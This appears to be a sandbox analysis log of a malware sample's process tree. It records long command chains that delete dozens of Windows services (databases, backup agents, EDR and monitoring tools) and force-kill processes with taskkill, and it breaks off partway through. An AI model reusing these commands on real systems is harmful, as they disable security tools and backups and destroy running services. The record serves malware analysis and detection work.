C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""3⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1ClrAgent4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1TNSListener4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleServiceORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete aspnet_state @sc delete Redis4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete JhTask4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete XT800Service_Personal4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MCService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete allpass_redisservice_port211604⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Flash Helper Service"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Kiwi Syslog Server"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UWS HiPriv Services"4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UWS LoPriv Services"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ftnlsv34⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ftnlses34⤵
-
C:\Windows\SysWOW64\sc.exesc delete FxService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "UtilDev Web Server Pro"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdwks4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ftusbrdsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client Guard"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE USBIP Client"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "ZTE FileTranS"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete wwbizsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete qemu-ga4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AlibabaProtect4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete kbasesrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MMRHookService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL4⤵
-
C:\Windows\SysWOW64\sc.exesc delete KuaiYunTools4⤵
-
C:\Windows\SysWOW64\sc.exesc delete KMSELDI4⤵
-
C:\Windows\SysWOW64\sc.exesc delete btPanel4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Protect_2345Explorer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete 2345PicSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-agent4⤵
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-server4⤵
-
C:\Windows\SysWOW64\sc.exesc delete vmware-converter-worker4⤵
-
C:\Windows\SysWOW64\sc.exesc delete QQCertificateService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete OracleRemExecService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSDaemon4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSUserSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSDownSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSStorageSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSDataProcSvr4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete GPSGatewaySvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSMediaSvr4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSLoginSvr4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete GPSTomcat64⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSMysqld4⤵
-
C:\Windows\SysWOW64\sc.exesc delete GPSFtpd4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1004⤵
-
C:\Windows\SysWOW64\sc.exesc delete IpOverUsbSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ZTEVdservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Zabbix Agent"4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentAccelerator4⤵
-
C:\Windows\SysWOW64\sc.exesc delete bedbg4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecDeviceMediaService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecRPCService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecAgentBrowser4⤵
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecJobEngine4⤵
-
C:\Windows\SysWOW64\sc.exesc delete BackupExecManagementService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MDM4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TxQBService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Gailun_Downloader4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RemoteAssistService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete YunService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""3⤵
-
C:\Windows\SysWOW64\sc.exesc delete MSCRMAsyncService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete REPLICA4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCATS4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete RTCAVMCU4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete RtcQms4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCMEETINGMCU4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCIMMCU4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCDATAMCU4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RTCCDR4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ProjectEventService164⤵
-
C:\Windows\SysWOW64\sc.exesc delete ProjectQueueService164⤵
-
C:\Windows\SysWOW64\sc.exesc delete SPAdminV44⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SPSearchHostController4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SPTimerV44⤵
-
C:\Windows\SysWOW64\sc.exesc delete SPTraceV44⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete c2wts4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ADWS4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoard574⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MotionBoardRCService574⤵
-
C:\Windows\SysWOW64\sc.exesc delete vsvnjobsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete VisualSVNServer4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete BestSyncSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete LPManager4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MediatekRegistryWriter4⤵
-
C:\Windows\SysWOW64\sc.exesc delete RaAutoInstSrv_RT28704⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "FlexNet Licensing Service 64"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete CobianBackup104⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLANYs_sem54⤵
-
C:\Windows\SysWOW64\sc.exesc delete CASLicenceServer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete SQLService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete semwebsrv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete TbossSystem4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AppFabricCachingService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete ProjectCalcService164⤵
-
C:\Windows\SysWOW64\sc.exesc delete ErpEnvSvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete OSearch164⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.DispatchService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Autoupgrade.UpdateService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Config.WindowsService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.DataCenterService4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.SchedulingService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete Mysoft.Setup.InstallService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MysoftUpdate4⤵
-
C:\Windows\SysWOW64\sc.exesc delete edr_monitor4⤵
-
C:\Windows\SysWOW64\sc.exesc delete abs_deployer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete savsvc4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxMonitorService4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete ShareBoxService4⤵
-
C:\Windows\SysWOW64\sc.exesc delete CloudExchangeService4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSDS.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer_Service.exe /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CasLicenceServer.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_w32.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_x64.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rdm.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRT.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRTPortable.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBox.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSVC.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBoxVM.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM abs_deployer.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_monitor.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfupdatemgr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ipc_proxy.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_agent.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_sec_plan.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfavsvc.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxMonitorService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchangeService.exe /F4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExec.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Att.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mdm.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExecManagementService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bengine.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM benetns.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beserver.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pvlsvr.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bedbg.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RemoteAssistProcess.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarMoniService.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGameSrv.exe /F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarCMService.exe /F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsService.exe /F4⤵
-
